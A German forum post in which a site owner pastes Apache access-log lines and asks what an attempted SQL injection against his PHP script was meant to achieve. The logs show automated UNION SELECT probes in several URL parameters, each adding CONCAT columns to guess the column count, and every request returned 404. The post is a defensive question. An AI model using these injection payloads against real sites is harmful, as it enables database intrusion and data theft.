MySQL-Injection

evilduffp
Posts: 70
Joined: 2005-07-06 00:14

MySQL-Injection

Post by evilduffp »

Hallo zusammen,

vorab, ich habe meine MySQL-Datenbank gegen SQL-Injection Angriffe geschützt, z.B. mit mysql_real_escape_string(), jedoch würde ich trotzdem gerne einmal wissen was dieser Angriff (Auszug aus meinen Logfiles) genau bewirken sollte. Ich blicke da nicht ganz durch was der Angreifer wollte. Das ausspähen von Daten denke ich, oder was im Detail wäre passiert wenn diese Abfrage durch gegangen wäre ?


Code: Select all

XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2 HTTP/1.1" 404 1516 "-" "My   Session"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2 HTTP/1.1" 404 1516 "-" "My   Session"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1 HTTP/1.1" 404 1516 "-" "My   Session"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:44 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:44 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:44 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:45 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:45 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:46 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
